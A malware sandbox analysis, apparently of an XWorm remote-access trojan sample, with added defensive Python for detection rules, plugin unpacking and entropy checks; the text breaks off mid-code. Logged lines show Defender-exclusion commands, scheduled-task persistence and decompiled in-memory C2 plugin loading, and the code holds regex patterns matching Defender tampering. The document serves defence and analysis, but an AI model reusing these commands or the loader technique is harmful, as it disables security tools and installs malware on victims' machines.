            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Recaipt202431029.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Recaipt202431029.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Recaipt202431029.exe | Process created: C:\Users\user\Desktop\Recaipt202431029.exe "C:\Users\user\Desktop\Recaipt202431029.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Process created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
Source: C:\Users\user\Desktop\Recaipt202431029.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"
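The process tree above is the sequence the Sigma rules named in the overview key on: powershell.exe adding a Windows Defender exclusion (applied through WMI, which is why powershell.exe spawns WmiPrvSE.exe and WmiPrvSE.exe later loads mpclient.dll), schtasks.exe importing a task definition from a .tmp file under the user's Temp directory, and the sample spawning a second copy of itself, the usual prelude to hollowing the child. The Python below is an added example, not code from the Joe Sandbox report or from the XWorm sample: it applies those three checks to constructed process-creation records shaped like the report's lines, including a -EncodedCommand variant of the Add-MpPreference call that a plain string match would miss. The rule names, the sample records, the benign control records and the prefix-matching of -EncodedCommand are mine; the paths are the report's.

```python
from __future__ import annotations

import base64
import re

# Constructed: the same cmdlet as the report's, hidden behind -enc (UTF-16LE, base64).
_ENCODED = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16-le")
).decode("ascii")

# Constructed process-creation records (parent image, child command line), shaped like
# the report's "Process created" lines. Not a real log export.
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\Recaipt202431029.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"'),
    (r"C:\Users\user\Desktop\Recaipt202431029.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"'),
    (r"C:\Users\user\Desktop\Recaipt202431029.exe",
     r'"C:\Users\user\Desktop\Recaipt202431029.exe"'),
    (r"C:\Users\user\Desktop\Recaipt202431029.exe",
     rf'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -enc {_ENCODED}'),
    # Constructed benign controls: a task imported from ProgramData, and a plain child process.
    (r"C:\Windows\explorer.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Backup" /XML "C:\ProgramData\Backup\task.xml"'),
    (r"C:\Windows\System32\svchost.exe", r'"C:\Windows\System32\notepad.exe"'),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_RE = re.compile(r"\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I)
_MP_EXCLUSION_RE = re.compile(r"add-mppreference\b.*?-exclusion(?:path|process|extension)", re.I)
_SCHTASKS_XML_RE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b.*?/xml\s+"?([^"\s]+)', re.I)
_TEMP_DIR_RE = re.compile(r"\\appdata\\local\\temp\\|\\windows\\temp\\|%temp%", re.I)


def first_token(cmdline: str) -> str:
    """Image path from a Windows command line: the quoted token, or the first bare one."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(None, 1)[0]


def decode_encoded_command(cmdline: str) -> str | None:
    """Cleartext of a -EncodedCommand payload, or None when absent or not valid base64/UTF-16."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(parent: str, cmdline: str) -> list[str]:
    """Names of the rules that fire for one (parent image, child command line) record."""
    image = first_token(cmdline)
    image_name = image.rsplit("\\", 1)[-1].lower()
    hits: list[str] = []

    if image_name in ("powershell.exe", "pwsh.exe"):
        text = cmdline
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:          # match the cmdlet in the decoded script as well
            text += " " + decoded
        if _MP_EXCLUSION_RE.search(text):
            hits.append("defender_exclusion_added")

    m = _SCHTASKS_XML_RE.search(cmdline)  # task definition imported from a temp directory
    if m and _TEMP_DIR_RE.search(m.group(1)):
        hits.append("scheduled_task_from_temp_xml")

    if image.lower() == parent.lower():   # a process launching its own image again
        hits.append("self_spawn_possible_hollowing")
    return hits


def scan(events) -> list[tuple[str, str, str]]:
    """(rule, parent, command line) for every rule hit across the records."""
    return [(rule, parent, cmd) for parent, cmd in events for rule in evaluate(parent, cmd)]


if __name__ == "__main__":
    for rule, parent, cmd in scan(SAMPLE_EVENTS):
        print(f"{rule:32} {parent} -> {cmd[:90]}")
```

Run against the constructed records this reports four hits (two exclusions, one task from Temp, one self-spawn) and nothing for the two controls. The self-spawn rule is deliberately broad; on a real endpoint it needs an allowlist for installers and updaters that legitimately relaunch themselves.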
Source: C:\Users\user\Desktop\Recaipt202431029.exe (first instance) | Section loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, textshaping.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (first instance) | Section loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (second instance) | Section loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe (first instance) | Section loaded (in order): kernel.appcore.dll, taskschd.dll, sspicli.dll
Source: C:\Users\user\Desktop\Recaipt202431029.exe (second instance) | Section loaded (in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, sxs.dll, mpr.dll, scrrun.dll, propsys.dll, profapi.dll, linkinfo.dll, ntshrui.dll, srvcli.dll, cscapi.dll, edputil.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wintypes.dll, wintypes.dll, mswsock.dll, wbemcomn.dll, amsi.dll, userenv.dll, avicap32.dll, msvfw32.dll, winmm.dll, winmm.dll
Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe (first instance) | Section loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, textshaping.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded (in order): fastprox.dll, ncobjapi.dll, wbemcomn.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, miutils.dll, gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe (second instance) | Section loaded (in order): kernel.appcore.dll, taskschd.dll, sspicli.dll
Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe (second instance) | Section loaded (in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
Source: C:\Users\user\Desktop\Recaipt202431029.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Notepab .lnk.9.dr | LNK file: ..\..\..\..\..\Notepab .exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Recaipt202431029.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Recaipt202431029.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Recaipt202431029.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Recaipt202431029.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: UQzc.pdbSHA256T | source: Recaipt202431029.exe, JvkAPBBIe.exe.0.dr, Notepab .exe.9.dr
Source: Binary string: UQzc.pdb | source: Recaipt202431029.exe, JvkAPBBIe.exe.0.dr, Notepab .exe.9.dr

            Data Obfuscation

Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Recaipt202431029.exe, Form6.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: JvkAPBBIe.exe.0.dr, Form6.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WG61eoLfq8l6bLFQSu.cs | .Net Code: kivwDGmrqN System.Reflection.Assembly.Load(byte[])
Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Messages.cs | .Net Code: Memory
Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WG61eoLfq8l6bLFQSu.cs | .Net Code: kivwDGmrqN System.Reflection.Assembly.Load(byte[])
Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Messages.cs | .Net Code: Memory
Source: Notepab .exe.9.dr, Form6.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 9.2.Recaipt202431029.exe.40a5570.0.raw.unpack, Form6.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
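The Messages.cs fragments show how a plugin reaches the implant: the C2 message is split into fields (Pack), field 3 is base64-decoded and run through Helper.Decompress, and the result goes to AppDomain.Load(byte[]) and is invoked through NewLateBinding.LateCall, so the plugin assembly never exists on disk and never passes through a file scanner. Whoever holds a capture of that message can recover the assembly by reversing the same two steps. The Python below is an added example, not code from the report or from XWorm, that does this unpacking and hands back the assembly bytes with their SHA-256 for hash lookups. Its assumptions are labelled in the code: the field delimiter stands in for Settings.SPL (the value is not on this page), Helper.Decompress is taken to be GZip with a raw-DEFLATE fallback, and fields 0 and 1 are placeholders; the message, delimiter and payload are constructed, and the payload is a minimal MZ/PE header rather than a real assembly.

```python
from __future__ import annotations

import base64
import gzip
import hashlib
import struct
import zlib

# Assumed delimiter standing in for Settings.SPL; the real value is not on this page.
SAMPLE_SPL = "|SPL|"

# Constructed stand-in for a plugin assembly: a 0x40-byte DOS header whose e_lfanew
# (offset 0x3C) points at a "PE\0\0" signature. Not a real .NET image.
FAKE_ASSEMBLY = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20


def looks_like_pe(data: bytes) -> bool:
    """MZ header plus a PE signature at e_lfanew; the minimum AppDomain.Load would need."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decompress(blob: bytes) -> bytes:
    """Stand-in for Helper.Decompress (assumption): GZip, as .NET's GZipStream emits,
    with a raw-DEFLATE fallback for a DeflateStream-style blob without the gzip header."""
    if blob[:2] == b"\x1f\x8b":
        return gzip.decompress(blob)
    return zlib.decompress(blob, -15)


def unpack_plugin_message(raw: str, spl: str = SAMPLE_SPL) -> tuple[str, bytes, str]:
    """Split into Pack[], decode Pack[3] the way the client does, and return
    (plugin name from Pack[2], assembly bytes, SHA-256 hex of those bytes)."""
    pack = raw.split(spl)
    if len(pack) < 4:
        raise ValueError(f"expected at least 4 fields, got {len(pack)}")
    assembly = decompress(base64.b64decode(pack[3], validate=True))
    if not looks_like_pe(assembly):
        raise ValueError("decoded payload is not a PE image")
    return pack[2], assembly, hashlib.sha256(assembly).hexdigest()


def build_sample_message(name: str, payload: bytes, spl: str = SAMPLE_SPL, codec: str = "gzip") -> str:
    """Constructed message in the shape the client expects. Fields 0 and 1 are
    placeholders; the page does not show what they carry."""
    if codec == "gzip":
        compressed = gzip.compress(payload)
    else:  # raw DEFLATE, as DeflateStream would emit
        c = zlib.compressobj(wbits=-15)
        compressed = c.compress(payload) + c.flush()
    return spl.join(["Plugin", "0", name, base64.b64encode(compressed).decode("ascii")])


if __name__ == "__main__":
    name, asm, digest = unpack_plugin_message(build_sample_message("Plugin1", FAKE_ASSEMBLY))
    print(name, len(asm), "bytes, sha256", digest)
```

In an incident the captured message is all that exists, so this decode is also how the plugin gets a hash to pivot on; the PE check is there because a wrong delimiter or a wrong codec guess yields garbage that would otherwise be hashed and searched for in vain.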
            Source: Recaipt202431029.exeStatic PE information: 0xCBDF6F70 [Sun May 22 04:05:04 2078 UTC]
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06867262 push esp; iretd 0_2_068672B9
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_068651E0 push es; ret 0_2_068651F0
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C73698 push eax; ret 0_2_06C73A31
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C78DF9 push eax; mov dword ptr [esp], edx0_2_06C78E0C
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C7E1AD push edx; ret 0_2_06C7E1B1
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C74960 push eax; iretd 0_2_06C74961
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D17746 pushfd ; ret 0_2_06D17747
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D104A0 pushfd ; ret 0_2_06D104A1
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D12EA4 push ds; iretd 0_2_06D12EA5
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D12E6D push ds; iretd 0_2_06D12E6E
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D17A8B pushfd ; ret 0_2_06D17A8C
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D17A6B pushfd ; ret 0_2_06D17A6C
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D1394B push ds; iretd 0_2_06D1394D
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_085070D9 push 0000005Dh; ret 0_2_08507107
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_0850A5D8 push eax; ret 0_2_0850A601
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_085006D7 push 0000005Dh; ret 0_2_085006FD
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_0563A800 push es; ret 9_2_0563A810
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_06EB3698 push eax; ret 10_2_06EB3A31
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_06EB8E09 push eax; mov dword ptr [esp], edx10_2_06EB8E0C
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_06EB4960 push eax; iretd 10_2_06EB4961
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_07057746 pushfd ; ret 10_2_07057747
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_070504A0 pushfd ; ret 10_2_070504A1
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_07057A6B pushfd ; ret 10_2_07057A6C
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_07057A8B pushfd ; ret 10_2_07057A8C
            Source: Recaipt202431029.exeStatic PE information: section name: .text entropy: 7.62917059033493
            Source: JvkAPBBIe.exe.0.drStatic PE information: section name: .text entropy: 7.62917059033493
            Source: Notepab .exe.9.drStatic PE information: section name: .text entropy: 7.62917059033493
Source: memory dumps 0.2.Recaipt202431029.exe.376c418.2.raw.unpack and 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack (both dumps contain the same classes with identical method names) | High entropy of concatenated method names:
  sh7KC6wSWH5lupliVZ.cs: 'z67SfmJXSx', 'ufeSLnOX5j', 'DVHSnYnut6', 'DqeSFtDBHv', 'tQqSWj8e6J', 'jhuSodZoLX', 'btaPWmIotAWIVmmlEr', 'FWsc9ORZIMRwoKdcTt', 'ppUSSLpsuk', 'OYHSa6Tp1a'
  wlS2y7giOFEEs2owSI.cs: 'IqCeyfFCs2', 'iH7e000Jbh', 'itTeZXj7q2', 'YY0ef9tuvu', 'nPYeGdj6gS', 'XiQeLWPyUm', 'Next', 'Next', 'Next', 'NextBytes'
  V8FJEZip6OQ2GOLBYD.cs: 'KXJGXilugw', 'O06GRhlYTG', 'kotGCx6dvS', 'bVjGhCNZvG', 'RpvGdsKGKp', 'XgrGIHNJsq', 'JgaG1yHl3e', 'omKGqhvgit', 'DBOG8JHlCj', 'fr5GlWaLtD'
  ubnIk5PQJIHdNPtA1C.cs: 'EGFWlVYV55', 'rwEWVtYX27', 'sUqWPEVAOh', 'kiwWt8kwXQ', 'bmHWR7aLoD', 'viVWCeIxIC', 'FMaWhu6wln', 'RMMWd9gaD7', 'axsWI8q9EV', 'JqpW1iO8CB'
  JDLHBOzmg9HpYy5oc4.cs: 'm2Ler9bPfK', 'NGgemxGFSB', 'MTSeEvKZoe', 'FGTeX7aiwT', 'ItKeRbZipD', 'Porehwc9rb', 'y5LedbsBJw', 'B8beMBa6qG', 'hjXeQc5434', 'Vigejv8JGM'
  v0QynmYEK8NGGZ1gt8.cs: 'I0PkmIg5fT', 'fmbkE5EtTY', 'UmWkXj7jul', 'h79kRXnj9Y', 'YVokhFeV0i', 'MQEkdKqbHq', 'zfwk1eSBXX', 'LcXkqCoPU4', 'Tplkl0Slit', 'sn5kv17dS2'
  USoDbmEVHYnut6mqet.cs: 'x3Nyssiqu0', 'q22yrEV9CK', 'BO1ym8qS9K', 'mTkyEPhCQm', 'GgAyWQXXip', 'ICsyou8Fl8', 'J3fyAI5Pub', 'W8LyBrcbWZ', 'Q31yGWJIZ4', 'SZUyeyspwu'
  AB63Sw8S5ve08y5BmM.cs: 'wq2fQU7LN0', 'wbtfjM0qoJ', 'cnufDPDIVo', 'OUqfskU2yV', 'tMLfNyqk0b', 'AvHfru6kcx', 'ElJfOLp49j', 'RFUfm52LIi', 'c7UfEehfc4', 'BwWf6UaEut'
  aQcGssyEghRnbtv7BY.cs: 'EditValue', 'GetEditStyle', 'ofuHiQJb3K', 'fwQHgEed2I', 'GUMHzWtVqr', 'e4OaTeHSO6', 'LhmaS8L57g', 'xSOaHZ0gFe', 'WoqaaBNysq', 'PW78skrgqfsnC6Urx6U'
  E8dYjnUb8wp63GcZvn.cs: 'Dispose', 'zFgSivJ2wQ', 'Jj7HR4tQ15', 'Yl4AHKwNKw', 'NZQSgsCest', 'JTUSzd6BJN', 'ProcessDialogKey', 'mAJHT8FJEZ', 'U6OHSQ2GOL', 'qYDHHulS2y'
  WG61eoLfq8l6bLFQSu.cs: 'wkNaxWs0LF', 'lypa3ibyT9', 'EkhaUqA0MP', 'QYmaylGbWs', 'f4Ga0nZ5ex', 'aKJaZPmWik', 'XBcafkCGg5', 'CqdaLQZ3Vb', 'MjEa4h0XrO', 'I1hantLiSl'
  khktj394Jq4k0Qihck.cs: 'QLtAnNeXjS', 'JVdAFKiOP6', 'ToString', 'YKYA32pPlZ', 'JXhAUGoXjo', 'RRhAywvRZM', 'mQpA0vsvFr', 'zxuAZRgMVV', 'HOmAftrePN', 'gMUALxjgUX'
  zBHva96SRgInJKQqj8.cs: 's5J0NCkqhJ', 'K4G0On4kwW', 'uMqyCYkJux', 'tLYyhxtpmN', 'oRMydTkpEj', 'ibDyIZYatU', 'WHry1QX5dD', 'giQyqJd44Z', 'rEay87JYP5', 'fgGyllFu9v'
  WmJXSxm2fenOX5jabt.cs: 'F1dUPKscHs', 'xi7UtUmJPW', 'urcUbPfVhb', 'lZgU9agSZn', 'yANUpxhlH9', 'U9oUJ4wLUr', 'bCxU5JRNXB', 'JbLU7YuFWB', 'u7JUiwflxH', 'jXeUgxRGoT'
  CqStfMSwAuy8wsILkBw.cs: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hRT2GDkirt', 'xos2eReCWZ', 'zd32KrXZ3q', 'kZb222i18u', 'vHp2cnDwie', 'ahQ2ucDtDJ', 'K3J2MFQfeL'
  s6JfhuXdZoLXbWm70r.cs: 'SIyZxG1ypv', 'svfZUNekVL', 'BLVZ0j7jHQ', 'WrgZfKNDUc', 'cWEZLoy7h5', 'Tuj0pYYxKu', 'bAW0JKMnWw', 'lOb05rjqhK', 'ldp07cShRX', 'aMf0iGnEnh'
  CFlDOXHJlcGxx7H9P7.cs: 'SqxDjywEq', 'jUfsdokxj', 'ATCrwam09', 'A7AOR3bev', 'm4KErBiLO', 'loR6pDUEK', 'jhbf7TQnx014IIgI5w', 'QNwMfvZSWoUmkk2XEn', 'CYU18QKGLkuV5qbsqh', 'HMyBGMHx3'
  yeJy9DSSkBnI5UsF9ey.cs: 'LldegolArn', 'NP8ezW3aZ4', 'NJBKTG3A5R', 'pJYKSaErXF', 'zK6KH1i3lR', 'cb5Ka9MUZ7', 'u6UKwn5Pui', 'zp4KxFu2ur', 'XSiK3LGBkc', 'mokKUqDMlj'
  TLKBrM5TcDFgvJ2wQl.cs: 'FwsGWBnyrS', 'VwbGAEPOWe', 'I8cGGnCwHa', 'Wo0GKi9oAq', 'PTQGc0HcWb', 'loWGMY10HO', 'Dispose', 'z6UB3YD1od', 'EqsBUUj1VY', 'afUByUGW2e'

Note: the readable names that survive ('Next'/'NextBytes', 'Dispose', 'ToString', 'ProcessDialogKey', 'EditValue'/'GetEditStyle', 'CanConvertFrom'/'ConvertFrom'/'ConvertTo') are overrides of .NET framework virtual methods (System.Random, IDisposable, Control, UITypeEditor, TypeConverter), which a renaming obfuscator must leave intact for the runtime to bind them. They are a cheap way to recognise the base classes of an obfuscated assembly without decompiling.
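Shannon entropy is the measurement behind both the ".text entropy: 7.629" entries and the "High entropy of concatenated method names" entries above. The following is an added example, not Joe Sandbox code: the 7.0 and 4.5 thresholds are assumptions, the two section byte strings are constructed, and the identifier lists are copied from the report.

```python
"""Shannon entropy applied to a PE section and to joined .NET method names.
Added example, not Joe Sandbox code. Thresholds are assumptions; the byte
inputs are constructed, the identifier lists come from the report above."""
import math
from collections import Counter
from typing import Sequence, Union


def shannon_entropy(data: Union[bytes, str]) -> float:
    """Bits per symbol of the empirical distribution over `data`.

    0.0 for a single repeated symbol, at most log2(#distinct symbols),
    so never above 8.0 for a byte string."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Assumed thresholds; tune them against your own clean/packed corpus.
PACKED_SECTION_THRESHOLD = 7.0    # native x86 code usually lands around 6.0-6.6 bits/byte
OBFUSCATED_NAMES_THRESHOLD = 4.5  # camelCase English identifiers stay below this


def section_looks_packed(section_bytes: bytes) -> bool:
    """True when a code section is dense enough to be compressed or encrypted."""
    return shannon_entropy(section_bytes) >= PACKED_SECTION_THRESHOLD


def names_look_obfuscated(method_names: Sequence[str]) -> bool:
    """Sandbox-style heuristic: entropy of all method names of one class, joined."""
    return shannon_entropy("".join(method_names)) >= OBFUSCATED_NAMES_THRESHOLD


def _prng_bytes(n: int, seed: int = 0x12345678) -> bytes:
    """Deterministic LCG stream standing in for an encrypted payload (constructed)."""
    out = bytearray()
    x = seed
    for _ in range(n):
        x = (1103515245 * x + 12345) & 0x7FFFFFFF
        out.append((x >> 16) & 0xFF)
    return bytes(out)


# Constructed section contents: repetitive text-like bytes vs. a pseudo-random blob.
PLAIN_SECTION = b"push ebp; mov ebp, esp; sub esp, 0x40; call dword ptr [eax]; leave; ret\x00" * 64
PACKED_SECTION = _prng_bytes(4096)

# Method names of sh7KC6wSWH5lupliVZ.cs as listed in the report ...
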